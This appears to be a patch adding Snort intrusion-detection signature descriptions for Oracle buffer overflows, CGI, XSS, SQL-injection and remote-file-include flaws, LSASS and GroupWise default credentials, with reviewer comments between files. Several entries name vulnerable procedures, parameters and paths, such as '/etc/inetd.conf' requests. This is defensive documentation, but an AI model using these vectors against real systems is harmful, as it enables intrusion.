+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
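Review bot: the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit." belongs to a telnet or shell-command rule and is wrong here: the Summary says the trigger is "a command is issued to an Oracle database server", which arrives over a database session on $ORACLE_PORTS, not telnet. Drop it, and name the command or pattern the rule matches, because "a special command" gives an analyst nothing to verify. The $ORACLE_PORTS advice also appears twice (end of Detailed Information and again under False Negatives); keep the False Negatives version, which explains why a negotiated port causes misses, and delete the other. Attack Scenarios ("Simple. These are Oracle database commands.") is an ease-of-attack answer; describe an actual scenario, such as an attacker with a stolen or default account issuing privileged commands.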
--- /dev/null
+++ b/doc/signatures/2822.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2822
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure publish_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
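Review bot: same template defect as 2724.txt: the procedure name and the following sentence are split by a stray line break ("vulnerability in the procedure publish_flavor_definition" / ". This procedure is included in" / "sys.dbms_repcat_fla_mas."), and Affected Systems reads "Oracle Oracle9i". The package is given here schema-qualified (sys.dbms_repcat_fla_mas) while 2724 writes an unqualified dbms_repcat; pick one convention. Additional References is empty; link the Oracle alert or CVE covering the dbms_repcat_fla_mas overflow, and under Ease of Attack mention that the attacker needs a valid database login to call the procedure.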
--- /dev/null
+++ b/doc/signatures/100000556.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000556
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "sid" parameter in the "error.php" script used 
+by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
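Review bot: Impact and the second paragraph of Detailed Information describe server-side consequences ("system integrity compromise", "execute system binaries or malicious code") that a reflected cross-site scripting flaw in the "sid" parameter of error.php does not give; the injected script runs in the browser of the user who follows the link, which Attack Scenarios already states. Rewrite Impact around that (session cookie theft, actions performed in the victim's authenticated VebiMiau session, content injection) so the text matches the XSS FAQ it references. Formatting: the "--" separators after the Sid, after Affected Systems and after Contributors are missing the blank line that the other files use.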
--- /dev/null
+++ b/doc/signatures/2623.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2623
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "create_snapshot_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the first variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
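Review bot: "Oracle databases may use a built-in procedure to assist in useful tasks" says nothing; name the package that provides create_snapshot_repgroup, as 2724 and 2822 do for their procedures, and say which parameter overflows, since Detailed Information says "a long string in a parameter" while Attack Scenarios says "the first variable". The $ORACLE_PORTS note sits in Detailed Information with no explanation; move it to False Negatives and give the reason as 1686.txt does (the listener can redirect the session to a negotiated port, so watching 1521 and 1526 alone misses the traffic). Also "a Oracle database implementation" should be "an Oracle database implementation", and the single reference is a vendor policy page; add the Oracle alert or CVE.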
--- /dev/null
+++ b/doc/signatures/100000701.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000701
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "WordPress" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "paged" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "paged" parameter in the "index.php" script used by the "WordPress" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WordPress
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
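Review bot: Corrective Action ("Ensure the system is using an up to date version of the software") is the only remedy given, yet the description never says which WordPress versions are affected and Additional References cites only a generic SQL injection tutorial; add the version range and the advisory or CVE for the "paged" parameter in index.php so an analyst can tell whether a patched site is exposed. The third paragraph of Detailed Information (credential validation, "ona web server") is the CGI boilerplate and does not describe SQL injection; the second paragraph and Attack Scenarios already cover it, so drop the third. The file also starts with two blank lines before "Rule:", which the other files in this patch do not.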
--- /dev/null
+++ b/doc/signatures/1574.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1574
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
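Review bot: apart from the Sid, this file is identical to 809.txt later in this patch and to the generic CGI template: Summary, Detailed Information, Attack Scenarios and Corrective Action never say which CGI script or request string sid 1574 matches, Affected Systems is "All systems running CGI applications", and Additional References is empty. Add the script name, the vulnerable parameter and a reference for the vulnerability the rule was written for; otherwise "Simple. Exploits exist." is unverifiable. Minor: "ona web server" should be "on a web server", and the Detailed Information line ending "exploited by the attacker." runs well past the wrap width used for the rest of the file.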
--- /dev/null
+++ b/doc/signatures/809.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+809
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
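Review bot: as with 1574.txt, nothing here is specific to sid 809: the text is the shared CGI template with no script name, parameter, product or reference, so the "Exploits exist" claim and the patch advice cannot be acted on. Fill in what the rule's content match targets and link an advisory. Same typo and overlong line as 1574 ("ona web server"; the line ending "exploited by the attacker.").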
--- /dev/null
+++ b/doc/signatures/2525.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2525
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
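Review bot: Additional References is empty for a well-known vulnerability; the unchecked LSASS buffer giving remote code execution on Windows 2000, XP and 2003 described here matches the flaw fixed by Microsoft bulletin MS04-011 (CVE-2003-0533), and if that is the one this rule covers, link the bulletin and CVE. Attack Scenarios ("a specially crafted request to the LSASS service that could contain harmful code") should say the request arrives over RPC on the SMB and RPC ports listed in Corrective Action, which ties the firewall advice to the rule. Typos: "suscessful", "attcker".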
--- /dev/null
+++ b/doc/signatures/2157.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 2157
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the administration interface of IISProtect on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the administration interface of IISProtect on a host running Microsoft Internet Information Server (IIS).
+
+The attacker can gain administrator access to the web server running IISProtect without the need to authenticate.
+
+--
+Affected Systems:
+Any host using IISProtect.
+
+--
+Attack Scenarios:
+An attacker can gain control of the web server without the need to authenticate.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
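Review bot: False Positives says "None Known.", but the rule fires on any attempt to access the IISProtect administration interface, so a legitimate administrator using it will alert exactly as an attacker does (compare 2124.txt in this patch, which concedes the same for its login sessions). Note that, and state the URI the rule matches so the analyst can confirm whether the request hit the path that "can gain administrator access to the web server running IISProtect without the need to authenticate". Corrective Action's "Upgrade to the latest non-affected version" needs the affected IISProtect version(s), and Additional References is empty where the vendor advisory should be.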
--- /dev/null
+++ b/doc/signatures/100000377.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000377
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_forum_prune.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_forum_prune.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
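Review bot: the third paragraph of "Detailed Information:" (beginning "This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server.") is generic credential-validation boilerplate that does not describe a remote file include via "phpbb_root_path" and sits oddly beside the first paragraph; drop it or reduce it to the input-validation point. Typos: "running ona web server" -> "running on a web server", "attackers choosing" -> "attacker's choosing" (twice), and "an exploitation attempt has been attempted" in the Summary should read "an exploitation attempt has been made". "Additional References:" is empty; cite the advisory this rule is based on.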
--- /dev/null
+++ b/doc/signatures/1489.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1489
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
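Review bot: this file never says which known vulnerability Sid 1489 detects; the Summary, "Detailed Information:" and "Attack Scenarios:" sections ("Many known vulnerabilities exist ... the attack scenarios are legion") are generic text shared with other web-cgi signatures and give an analyst nothing to confirm the event against. Name the targeted script or product and the condition the rule content matches, and fill in "Additional References:", which is empty. Minor: "attackers choosing" -> "attacker's choosing"; the "Affected Systems:" entry is tab-indented while most files in this patch use no indent.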
--- /dev/null
+++ b/doc/signatures/1370.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+1370
+
+--
+Summary:
+Attempted inetd configuration access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a 
+webserver. The inetd configuration lists the daemons executed at boot 
+time on a UNIX or Linux based system. The attacker could possibly gain 
+information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 
+'/etc/inetd.conf'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries 
+outside of it's designated web root or cgi-bin. This file may also be 
+requested on a command line should the attacker gain access to the 
+machine. Making the file read only by the superuser on the system will 
+disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
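Review bot: the description of inetd.conf under "Detailed Information:" is inaccurate: "The inetd configuration lists the daemons executed at boot time" should say that it lists the network services inetd starts on demand when a connection arrives (boot-time daemons are started by the init scripts, not by inetd). The file is also missing the "Affected Systems:" section the other signature files carry. Typos: "'/etc/inetd.conf'in the URI" needs a space before "in", "outside of it's designated web root" -> "its", and the separator before "Additional References:" has trailing whitespace ("-- ").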
--- /dev/null
+++ b/doc/signatures/100000603.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000603
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_paid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_paid.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
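Review bot: same boilerplate problem as the other remote-file-include entries in this patch: the paragraph beginning "This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server." describes credential validation, not a file include via "admin_template_path", and should be cut. Fix "ona" -> "on a", "attackers choosing" -> "attacker's choosing", and "has been attempted" -> "has been made" in the Summary. Formatting: the "--" separators after "100000603", "All systems running CGI applications using Indexu" and the contributors list lack the blank line used elsewhere, and "Additional References:" is empty.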
--- /dev/null
+++ b/doc/signatures/2447.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2447
+
+--
+Summary:
+This event is generated when an attempt is made to access the servlet
+administration scripts on a Novell Groupwise servlet server.
+
+--
+Impact:
+Possible unauthorized administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the servlet
+administration scripts on a Novell Groupwise servlet server located in /servlet/ServletManager.
+
+The default installation has a known username and password for
+administration of the server.
+
+--
+Affected Systems:
+	Novell Groupwise 6.0
+	Novell Groupwise Enhancement Pack 5.5
+
+--
+Attack Scenarios:
+The attacker might login to the application using the default username
+and password gaining administrative access to the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
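Review bot: "Corrective Action:" only says to patch, but "Detailed Information:" states that "The default installation has a known username and password for administration of the server." The fix that addresses the documented issue is changing the default credentials and restricting who can reach /servlet/ServletManager; add both. Also "The attacker might login" -> "log in", and "Additional References:" is empty although the text describes a documented default-credential issue whose advisory should be cited.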
--- /dev/null
+++ b/doc/signatures/821.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+821
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
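Review bot: Sid 821 is documented with the same generic CGI text as Sid 1489 and the remote-file-include entries, and never names the CGI program or the request pattern the rule matches, so an analyst cannot tell this event apart from the others. Add the specific script and condition and fill in "Additional References:". Typos: "running ona web server" -> "on a", "attackers choosing" -> "attacker's choosing"; the line "relationships between the victim server and other hosts can be exploited by the attacker." is not wrapped like the rest of the paragraph.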
--- /dev/null
+++ b/doc/signatures/637.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+637
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
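Review bot: the Summary "This event is generated when a scan is detected." does not say what kind of scan (port, host, service or vulnerability scan) or what in the traffic Sid 637 matches; "Detailed Information:" should state that, since it decides how an analyst triages the event. The False Positives note ("A scanner may be used in a security audit.") is a good point and is worth extending with the suggestion to exclude the addresses of authorised scanners. Minor: "None Known." -> "None known."; "Additional References:" is empty.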
--- /dev/null
+++ b/doc/signatures/2610.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2610
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "cancel_statistics" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
